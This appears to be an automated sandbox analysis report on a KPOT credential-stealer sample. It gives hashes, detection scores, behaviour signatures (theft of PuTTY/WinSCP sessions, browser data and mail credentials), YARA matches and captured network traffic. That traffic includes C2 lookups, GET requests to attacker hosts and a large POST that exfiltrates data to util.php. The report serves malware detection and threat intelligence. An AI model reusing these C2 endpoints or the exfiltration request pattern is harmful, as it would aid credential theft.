Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129

Overview

General Information

Sample Name:	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129 (renamed file extension from 2129 to exe)
Analysis ID:	356849
MD5:	9dc97eaed4e61901afc327ce9f122262
SHA1:	41881d3463f4246d4d0146faf39703354bab83e9
SHA256:	4412624d06991fa64f684fcc6d66c787d040eaa12356885cf0a0919c732c82a3
Tags:	KPOTStealer
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Enables debug privileges

HTTP GET or POST without a user agent

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

Queries the volume information (name, serial number etc) of a device

Tries to load missing DLLs

Uses 32bit PE files

Yara signature match

Classification

Startup

System is w10x64

SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe (PID: 7084 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe' MD5: 9DC97EAED4E61901AFC327CE9F122262)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x34d0:$s1: \x0C\x10\x10\x14^KK 0x408d:$s1: ZFFB\x08\x1D\x1D 0x34b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1 0x34c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x34d0:$s1: \x0C\x10\x10\x14^KK 0x408d:$s1: ZFFB\x08\x1D\x1D 0x34b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1 0x34c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80
1.3.SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe.2bf0000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x28d0:$s1: \x0C\x10\x10\x14^KK 0x348d:$s1: ZFFB\x08\x1D\x1D 0x28b0:$s2: \x86\x9A\x9A\x9E\x9D\xD4\xC1\xC1 0x28c0:$s2: \xC7\xDB\xDB\xDF\xDC\x95\x80\x80

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Virustotal: Detection: 66%	Perma Link
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	Metadefender: Detection: 18%	Perma Link
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe	ReversingLabs: Detection: 79%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Uses new MSVCR Dlls

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.21.20:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.115.26.106:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.75.198.178:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.13:443 -> 192.168.2.6:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.80.20.20:443 -> 192.168.2.6:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.54.82.12:443 -> 192.168.2.6:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.12.6:443 -> 192.168.2.6:49781 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2029837 ET TROJAN KPOT Stealer Initial CnC Activity M4 192.168.2.6:49785 -> 47.91.94.99:80

Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.byContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.coContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.imContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.ioContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.linkContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.nuContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.proContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: 47.91.94.99
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: 47.91.94.99
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Host: 47.91.94.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Host: 47.91.94.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.com
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/ HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.com
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/login.php HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.comCookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: dolboeb1701.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /bgczXibj92HSlSCK/util.php HTTP/1.1Content-Type: application/octet-streamContent-Encoding: binaryHost: dolboeb1701.comContent-Length: 860177Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.byContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.coContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.imContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.ioContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.linkContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.nuContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /r/kpotuvorot10.bit HTTP/1.1Host: bdns.proContent-Length: 0
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: 47.91.94.99
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: 47.91.94.99
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Host: 47.91.94.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Host: 47.91.94.99Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.com
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/ HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.com
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/login.php HTTP/1.1Connection: Keep-AliveHost: dolboeb1701.comCookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2
Source: global traffic	HTTP traffic detected: GET /bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615 HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: dolboeb1701.comConnection: Keep-AliveCache-Control: no-cache

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.562744321.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.562744321.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php= equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554520022.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.phpj equals www.facebook.com (Facebook)
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560432557.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php\| equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: bdns.by

Source: unknown

HTTP traffic detected: POST /bgczXibj92HSlSCK/util.php HTTP/1.1Content-Type: application/octet-streamContent-Encoding: binaryHost: dolboeb1701.comContent-Length: 860177Connection: Keep-AliveCache-Control: no-cache

Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.599195628.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://47.91.94.99/bgczXibj92HSlSCK
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.599195628.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identru1
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.599195628.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: http://dolboeb1701.com/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560535211.000000000555C000.00000004.00000001.sdmp	String found in binary or memory: http://dolboeb1701.com/bgczXibj92HSlSCK/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573816242.0000000002EFB000.00000004.00000001.sdmp	String found in binary or memory: http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573816242.0000000002EFB000.00000004.00000001.sdmp	String found in binary or memory: http://dolboeb1701.com/bgczXibj92HSlSCK/util.php?id=53E61D202B0F807656615R
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.540284223.0000000005559000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560432557.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe8
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560432557.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeC
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.550092812.0000000005559000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exem
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/chrome
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/chrome(
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.568301447.000000000331C000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.560738292.000000000550F000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.562744321.0000000005555000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.549681427.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlG
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.558706102.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlY
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlc
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574022130.0000000002EBD000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573429634.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpN
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/J
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573653974.00000000054FD000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573481843.0000000005519000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573627321.00000000054F1000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.co/r/kpotuvorot10.bit
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.im/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.im/r/kpotuvorot10.bit
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.im/r/kpotuvorot10.bit-u
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.io/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.io/r/kpotuvorot10.bit
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.io/r/kpotuvorot10.bitqu
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.link/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.nu/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.nu/l
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.nu/r/kpotuvorot10.bit
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.pro/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573943506.0000000002EB5000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.pro/$
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.pro/r/kpotuvorot10.bit
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://bdns.pro/r/kpotuvorot10.bitr~
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.574002701.0000000002EA8000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573429634.0000000005555000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573682947.00000000054D9000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1-
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573741077.00000000054CB000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1s
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	String found in binary or memory: https://dotbit.me/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab$
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.543675957.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.546851098.0000000005555000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.588814859.0000000002E7D000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784L.F
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573455129.00000000055A2000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/RuZ
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573653974.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.573653974.00000000054FD000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0r&4-
Source: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe, 00000001.00000003.554640528.00000000057B1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
